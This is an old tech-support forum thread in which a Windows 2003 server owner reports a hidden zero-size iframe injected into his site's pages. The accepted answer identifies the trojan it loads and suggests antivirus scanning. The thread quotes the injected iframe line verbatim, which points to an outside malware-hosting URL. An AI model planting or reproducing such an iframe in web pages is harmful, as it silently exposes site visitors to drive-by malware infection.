Virus on windows 2003 server: Iframe in top of website

Posted on 2006-10-29
Medium Priority
Last Modified: 2013-12-04

I got a virus on my Windows 2003 Server.
On one of our major websites this line of code is placed in the top of the page:

<iframe src="http://ricewine.be/hhbb.htm" width="0" height="0" frameborder="0"></iframe>

If I open the webpage and look in the asp-file on the server, the  "iframe"-code is not there!

Anyone who know what this is? How to remove it, and why I got it?
Yes, all my software is legal, no software cracks on the server ;)

Please give me some tips to remove the virus!!!!
Question by:webressurs
LVL 34

Expert Comment

ID: 17830566
Are you hosting this on your server or is it at a hosting facility?

Do you have any ISAPI filters or wildcard application mappings configured?

Dave Dietz

Author Comment

ID: 17832144
Yes, this is my own windows 2003 webserver.
I dont really know wht ISAPI or wildcard application are, so I guess I dont use it :)
Mabye a virus have installed something like this...? I dont unerstand how this Iframe can appear in the website header, and how to remove it...?

Accepted Solution

Mnf earned 1500 total points
ID: 17836206
i followed the link you specify and a Trojan with " VBS.Psyme.cf" was catched by kaspersky antivirus
look at this article to know more detailed about it and how it works.

i think any kind of antivirus program is good to identify this virus


Featured Post

Free Tool: Site Down Detector

Helpful to verify reports of your own downtime, or to double check a downed website you are trying to access.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

No security measures warrant 100% as a "silver bullet". The truth is we also cannot assume anything but a defensive and vigilance posture. Adopt no trust by default and reveal in assumption. Only assume anonymity or invisibility in the reverse. Safe…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
In response to a need for security and privacy, and to continue fostering an environment members can turn to for support, solutions, and education, Experts Exchange has created anonymous question capabilities. This new feature is available to our Pr…
Watch the video to know how one can repair corrupt Exchange OST file effortlessly and convert OST emails to MS Outlook PST file format by using Kernel for OST to PST converter tool. It can convert OST to MSG, MBOX, EML to access them. It can migrate…
Suggested Courses

619 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question